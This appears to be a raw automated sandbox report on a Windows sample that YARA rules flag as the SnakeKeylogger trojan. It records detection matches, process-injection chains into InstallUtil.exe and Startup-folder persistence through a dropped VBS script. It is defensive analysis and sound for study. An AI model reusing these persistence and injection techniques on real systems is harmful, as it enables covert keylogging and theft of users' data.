                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6F6314_2_05E6F631
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6D1C04_2_05E6D1C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6F1A04_2_05E6F1A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6F1B04_2_05E6F1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6D1B04_2_05E6D1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E650FE4_2_05E650FE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6E8804_2_05E6E880
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6E8904_2_05E6E890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E600404_2_05E60040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E618414_2_05E61841
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6003F4_2_05E6003F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6E3F04_2_05E6E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E693F84_2_05E693F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E60B204_2_05E60B20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E60B304_2_05E60B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6DAE04_2_05E6DAE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6FAC14_2_05E6FAC1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6FAD04_2_05E6FAD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6DAD14_2_05E6DAD1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E62A004_2_05E62A00
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1328913885.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameJurfzqn.exe0 vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A53000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameHlrtmvgi.dll" vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000000.1316815148.0000000000312000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameJurfzqn.exe0 vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1353607165.00000000054D0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1351346370.0000000004D70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameHlrtmvgi.dll" vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A7C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe | Binary or memory string: OriginalFilenameJurfzqn.exe0 vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: pbgjw8i8N7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: XsdType.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: pbgjw8i8N7.exe, XsdType.exe.0.dr | Binary or memory string: application/vnd.openxmlformats-officedocument.presentationml.slide.slk1application/vnd.ms-excel.sln
                      Source: pbgjw8i8N7.exe, XsdType.exe.0.dr | Binary or memory string: .csproj.css
                      Source: pbgjw8i8N7.exe, XsdType.exe.0.dr | Binary or memory string: .vbproj.vbs
                      Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@4/4
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs"
                      Source: pbgjw8i8N7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: pbgjw8i8N7.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: pbgjw8i8N7.exe | Virustotal: Detection: 70%
                      Source: pbgjw8i8N7.exe | ReversingLabs: Detection: 63%
                      Source: pbgjw8i8N7.exe | String found in binary or memory: .aiff.airwapplication/vnd.adobe.air-application-installer-package+zip.amc%application/x-mpeg
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | File read: C:\Users\user\Desktop\pbgjw8i8N7.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\pbgjw8i8N7.exe "C:\Users\user\Desktop\pbgjw8i8N7.exe"
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs"
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\XsdType.exe "C:\Users\user\AppData\Roaming\XsdType.exe"
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\XsdType.exe "C:\Users\user\AppData\Roaming\XsdType.exe"
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: cryptsp.dll
